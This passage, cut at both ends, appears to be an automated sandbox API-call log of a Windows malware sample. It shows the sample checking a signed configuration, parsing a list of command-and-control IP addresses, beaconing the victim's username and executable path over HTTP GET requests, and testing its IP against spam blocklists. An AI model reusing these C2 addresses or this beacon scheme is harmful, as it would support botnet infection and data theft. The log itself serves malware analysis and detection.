dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.105] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.105] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0148.105] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.105] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.105] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.106] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.106] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0148.106] CryptDestroyHash (hHash=0x332b7890) returned 1 [0148.106] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.106] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.107] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.107] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0148.107] CryptDestroyHash (hHash=0x332b7900) returned 1 [0148.107] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.107] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0148.107] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.108] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0148.108] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.108] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0148.108] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.108] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.108] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0148.108] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.108] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.111] CryptSetKeyParam (hKey=0x332b7660, dwParam=0x4, pbData=0xceb44*=0x1, dwFlags=0x0) returned 1 [0148.111] CryptSetKeyParam (hKey=0x332b7660, dwParam=0x1, pbData=0x32e591b0, dwFlags=0x0) returned 1 [0148.111] CryptDecrypt (in: hKey=0x332b7660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e41af0, pdwDataLen=0xceb2c | out: pbData=0x32e41af0, pdwDataLen=0xceb2c) returned 1 [0148.111] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.111] CryptDestroyKey (hKey=0x332b7660) returned 0 [0148.111] GetVersion () returned 0x295a000a [0148.111] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xcea98, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xcea98) returned 0x0 [0148.111] BCryptImportKeyPair (in: hAlgorithm=0x332a1670, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xcea90, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xcea90) returned 0x0 [0148.111] BCryptGetProperty (in: hObject=0x337bb180, pszProperty="SignatureLength", pbOutput=0xcea8c, cbOutput=0x4, pcbResult=0xceaac, dwFlags=0x0 | out: pbOutput=0xcea8c, pcbResult=0xceaac) returned 0x0 [0148.111] BCryptVerifySignature (hKey=0x337bb180, pPaddingInfo=0x0, pbHash=0x32e41e10, cbHash=0x30, pbSignature=0x32e41d8a, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0148.112] BCryptDestroyKey (in: hKey=0x337bb180 | out: hKey=0x337bb180) returned 0x0 [0148.112] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x332a1670, dwFlags=0x0 | out: hAlgorithm=0x332a1670) returned 0x0 [0148.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41e10 | out: hHeap=0x2150000) returned 1 [0148.112] CharLowerBuffA (in: lpsz="servconf", cchLength=0x8 | out: lpsz="servconf") returned 0x8 [0148.112] CharLowerBuffA (in: lpsz="expir", cchLength=0x5 | out: lpsz="expir") returned 0x5 [0148.112] CharLowerBuffA (in: lpsz="plugins", cchLength=0x7 | out: lpsz="plugins") returned 0x7 [0148.112] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4 [0148.116] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4 [0148.116] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4 [0148.116] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4 [0148.116] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4 [0148.116] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.117] CharLowerBuffA (in: lpsz="psrva", cchLength=0x5 | out: lpsz="psrva") returned 0x5 [0148.121] StrStrIW (lpFirst="45.239.232.200:443", lpSrch=":") returned=":443" [0148.121] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0148.121] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49e40, Size=0x10) returned 0x32e4a0e0 [0148.121] StrStrIW (lpFirst="88.87.15.96:443", lpSrch=":") returned=":443" [0148.121] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0148.121] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49d80, Size=0x10) returned 0x32e49e00 [0148.121] StrStrIW (lpFirst="177.75.5.222:443", lpSrch=":") returned=":443" [0148.121] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0148.121] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f80, Size=0x10) returned 0x32e49fa0 [0148.121] StrStrIW (lpFirst="59.4.68.75:443", lpSrch=":") returned=":443" [0148.121] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0148.121] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a020, Size=0x10) returned 0x32e49f00 [0148.121] StrStrIW (lpFirst="186.235.48.8:443", lpSrch=":") returned=":443" [0148.121] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0148.121] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49fa0, Size=0x10) returned 0x32e49ec0 [0148.121] StrStrIW (lpFirst="118.173.0.135:44237", lpSrch=":") returned=":44237" [0148.121] StrStrIW (lpFirst="44237", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49fc0, Size=0x10) returned 0x32e4a020 [0148.122] StrStrIW (lpFirst="108.114.6.135:30161", lpSrch=":") returned=":30161" [0148.122] StrStrIW (lpFirst="30161", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49ea0, Size=0x10) returned 0x32e49e00 [0148.122] StrStrIW (lpFirst="74.67.45.226:28636", lpSrch=":") returned=":28636" [0148.122] StrStrIW (lpFirst="28636", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a080, Size=0x10) returned 0x32e4a060 [0148.122] StrStrIW (lpFirst="16.37.119.188:21468", lpSrch=":") returned=":21468" [0148.122] StrStrIW (lpFirst="21468", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a0c0, Size=0x10) returned 0x32e49e80 [0148.122] StrStrIW (lpFirst="172.33.203.18:60380", lpSrch=":") returned=":60380" [0148.122] StrStrIW (lpFirst="60380", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49d80, Size=0x10) returned 0x32e4a080 [0148.122] StrStrIW (lpFirst="121.34.93.60:32415", lpSrch=":") returned=":32415" [0148.122] StrStrIW (lpFirst="32415", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f80, Size=0x10) returned 0x32e49f40 [0148.122] StrStrIW (lpFirst="168.59.140.238:46751", lpSrch=":") returned=":46751" [0148.122] StrStrIW (lpFirst="46751", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49fc0, Size=0x10) returned 0x32e49f20 [0148.122] StrStrIW (lpFirst="151.250.235.56:4295", lpSrch=":") returned=":4295" [0148.122] StrStrIW (lpFirst="4295", lpSrch=":") returned 0x0 [0148.122] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a020, Size=0x10) returned 0x32e4a060 [0148.123] StrStrIW (lpFirst="30.103.58.1:23711", lpSrch=":") returned=":23711" [0148.123] StrStrIW (lpFirst="23711", lpSrch=":") returned 0x0 [0148.123] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f00, Size=0x10) returned 0x32e49e80 [0148.123] StrStrIW (lpFirst="242.227.56.69:55921", lpSrch=":") returned=":55921" [0148.123] StrStrIW (lpFirst="55921", lpSrch=":") returned 0x0 [0148.123] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49da0, Size=0x10) returned 0x32e4a0e0 [0148.123] StrStrIW (lpFirst="233.179.142.9:15580", lpSrch=":") returned=":15580" [0148.123] StrStrIW (lpFirst="15580", lpSrch=":") returned 0x0 [0148.123] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49e40, Size=0x10) returned 0x32e49fc0 [0148.123] StrStrIW (lpFirst="246.99.221.66:49040", lpSrch=":") returned=":49040" [0148.123] StrStrIW (lpFirst="49040", lpSrch=":") returned 0x0 [0148.123] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a0e0, Size=0x10) returned 0x32e49f20 [0148.123] GetUserNameW (in: lpBuffer=0xceab0, pcbBuffer=0xce9dc | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xce9dc) returned 1 [0148.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0148.124] GetTickCount () returned 0xe8ebaf [0148.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x7ffb262e0000 [0148.125] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="UrlEscapeW") returned 0x7ffb262ec9d0 [0148.125] UrlEscapeW (in: pszUrl="user", pszEscaped=0x32e5c2b0, pcchEscaped=0xcdf2c, dwFlags=0x0 | out: pszEscaped="user", pcchEscaped=0xcdf2c) returned 0x0 [0148.126] UrlEscapeW (in: pszUrl="RDhJ0CNFevzX", pszEscaped=0x32e5fa80, pcchEscaped=0xcdf2c, dwFlags=0x0 | out: pszEscaped="RDhJ0CNFevzX", pcchEscaped=0xcdf2c) returned 0x0 [0148.126] WinHttpCloseHandle (hInternet=0x7581f0) returned 1 [0148.126] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/14/user/RDhJ0CNFevzX/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7581f0 [0148.126] WinHttpSetOption (hInternet=0x7581f0, dwOption=0x1f, lpBuffer=0xcdf58, dwBufferLength=0x4) returned 1 [0148.127] WinHttpSendRequest (hRequest=0x7581f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0148.678] WinHttpReceiveResponse (hRequest=0x7581f0, lpReserved=0x0) returned 1 [0148.678] WinHttpQueryHeaders (in: hRequest=0x7581f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xcdf54, lpdwBufferLength=0xcdf5c, lpdwIndex=0x0 | out: lpBuffer=0xcdf54*, lpdwBufferLength=0xcdf5c*=0x4, lpdwIndex=0x0) returned 1 [0148.678] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fe90 | out: hHeap=0x2150000) returned 1 [0148.694] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c2b0 | out: hHeap=0x2150000) returned 1 [0148.694] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0148.694] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xf0) returned 0x32e413d0 [0148.695] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e407b0 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8ede2 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] GetTickCount () returned 0xe8edf1 [0148.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e5c2b0 [0148.695] UrlEscapeW (in: pszUrl="path", pszEscaped=0x32e5c2b0, pcchEscaped=0xce14c, dwFlags=0x0 | out: pszEscaped="path", pcchEscaped=0xce14c) returned 0x0 [0148.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e5fa80 [0148.695] UrlEscapeW (in: pszUrl="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", pszEscaped=0x32e5fa80, pcchEscaped=0xce14c, dwFlags=0x0 | out: pszEscaped="C:%5CUsers%5CRDhJ0CNFevzX%5CAppData%5CLocal%5CbrowDownload55%5Cc3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", pcchEscaped=0xce14c) returned 0x0 [0148.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2000) returned 0x32e5fe90 [0148.696] WinHttpCloseHandle (hInternet=0x7581f0) returned 1 [0148.696] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/14/path/C:%5CUsers%5CRDhJ0CNFevzX%5CAppData%5CLocal%5CbrowDownload55%5Cc3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x72ff30 [0148.696] WinHttpSetOption (hInternet=0x72ff30, dwOption=0x1f, lpBuffer=0xce178, dwBufferLength=0x4) returned 1 [0148.696] WinHttpSendRequest (hRequest=0x72ff30, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0149.276] WinHttpReceiveResponse (hRequest=0x72ff30, lpReserved=0x0) returned 1 [0149.276] WinHttpQueryHeaders (in: hRequest=0x72ff30, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce174, lpdwBufferLength=0xce17c, lpdwIndex=0x0 | out: lpBuffer=0xce174*, lpdwBufferLength=0xce17c*=0x4, lpdwIndex=0x0) returned 1 [0149.276] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fe90 | out: hHeap=0x2150000) returned 1 [0149.276] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c2b0 | out: hHeap=0x2150000) returned 1 [0149.276] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0149.276] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e413d0 | out: hHeap=0x2150000) returned 1 [0149.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcecc8 | out: lpSystemTimeAsFileTime=0xcecc8*(dwLowDateTime=0xe57d5afc, dwHighDateTime=0x1d7b3c9)) [0149.276] GetTickCount () returned 0xe8f033 [0149.276] GetTickCount () returned 0xe8f033 [0149.276] GetTickCount () returned 0xe8f033 [0149.276] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xf0) returned 0x32e413d0 [0149.280] GetFileAttributesW (lpFileName="ver.txt" (normalized: "c:\\windows\\system32\\ver.txt")) returned 0xffffffff [0149.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e413d0 | out: hHeap=0x2150000) returned 1 [0149.284] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e407b0 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.284] GetTickCount () returned 0xe8f033 [0149.285] GetTickCount () returned 0xe8f033 [0149.285] GetTickCount () returned 0xe8f033 [0149.285] GetTickCount () returned 0xe8f033 [0149.285] WinHttpCloseHandle (hInternet=0x72ff30) returned 1 [0149.285] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/23/2000033/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7581f0 [0149.285] WinHttpSetOption (hInternet=0x7581f0, dwOption=0x1f, lpBuffer=0xce128, dwBufferLength=0x4) returned 1 [0149.285] WinHttpSendRequest (hRequest=0x7581f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0149.810] WinHttpReceiveResponse (hRequest=0x7581f0, lpReserved=0x0) returned 1 [0149.810] WinHttpQueryHeaders (in: hRequest=0x7581f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce124, lpdwBufferLength=0xce12c, lpdwIndex=0x0 | out: lpBuffer=0xce124*, lpdwBufferLength=0xce12c*=0x4, lpdwIndex=0x0) returned 1 [0149.810] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b5b0 [0149.810] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xceb00 | out: lpWSAData=0xceb00) returned 0 [0149.810] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e413d0 [0149.810] StrStrIW (lpFirst="88.153.199.169", lpSrch=".") returned=".153.199.169" [0149.810] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49d80 [0149.810] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49da0 [0149.810] StrStrIW (lpFirst="153.199.169", lpSrch=".") returned=".199.169" [0149.810] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49d80, Size=0x10) returned 0x32e4a0c0 [0149.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49de0 [0149.811] StrStrIW (lpFirst="199.169", lpSrch=".") returned=".169" [0149.811] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a0c0, Size=0x20) returned 0x32e59840 [0149.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a000 [0149.811] StrStrIW (lpFirst="169", lpSrch=".") returned 0x0 [0149.811] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e59840, Size=0x20) returned 0x32e59990 [0149.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e20 [0149.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41900 [0149.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e20 | out: hHeap=0x2150000) returned 1 [0149.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a000 | out: hHeap=0x2150000) returned 1 [0149.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49de0 | out: hHeap=0x2150000) returned 1 [0149.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49da0 | out: hHeap=0x2150000) returned 1 [0149.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e59990 | out: hHeap=0x2150000) returned 1 [0149.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.zen.spamhaus.org", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0149.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41990 [0149.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.zen.spamhaus.org", cchWideChar=-1, lpMultiByteStr=0x32e41990, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="169.199.153.88.zen.spamhaus.org", lpUsedDefaultChar=0x0) returned 32 [0149.811] getaddrinfo (in: pNodeName="169.199.153.88.zen.spamhaus.org", pServiceName=0x0, pHints=0xce930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xce920 | out: ppResult=0xce920*=0x0) returned 11001 [0149.888] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41990 | out: hHeap=0x2150000) returned 1 [0149.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.cbl.abuseat.org", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0149.888] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e595a0 [0149.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.cbl.abuseat.org", cchWideChar=-1, lpMultiByteStr=0x32e595a0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="169.199.153.88.cbl.abuseat.org", lpUsedDefaultChar=0x0) returned 31 [0149.888] getaddrinfo (in: pNodeName="169.199.153.88.cbl.abuseat.org", pServiceName=0x0, pHints=0xce930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xce920 | out: ppResult=0xce920*=0x0) returned 11001 [0150.207] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e595a0 | out: hHeap=0x2150000) returned 1 [0150.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.b.barracudacentral.org", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0150.208] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41990 [0150.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.b.barracudacentral.org", cchWideChar=-1, lpMultiByteStr=0x32e41990, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="169.199.153.88.b.barracudacentral.org", lpUsedDefaultChar=0x0) returned 38 [0150.208] getaddrinfo (in: pNodeName="169.199.153.88.b.barracudacentral.org", pServiceName=0x0, pHints=0xce930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xce920 | out: ppResult=0xce920*=0x0) returned 11001 [0150.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41990 | out: hHeap=0x2150000) returned 1 [0150.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.dnsbl-1.uceprotect.net", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0150.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41990 [0150.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="169.199.153.88.dnsbl-1.uceprotect.net", cchWideChar=-1, lpMultiByteStr=0x32e41990, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="169.199.153.88.dnsbl-1.uceprotect.net", lpUsedDefaultChar=0x0) returned 38 [0150.454] getaddrinfo (in: pNodeName="169.199.153.88.dnsbl-1.uceprotect.net", pServiceName=0x0, 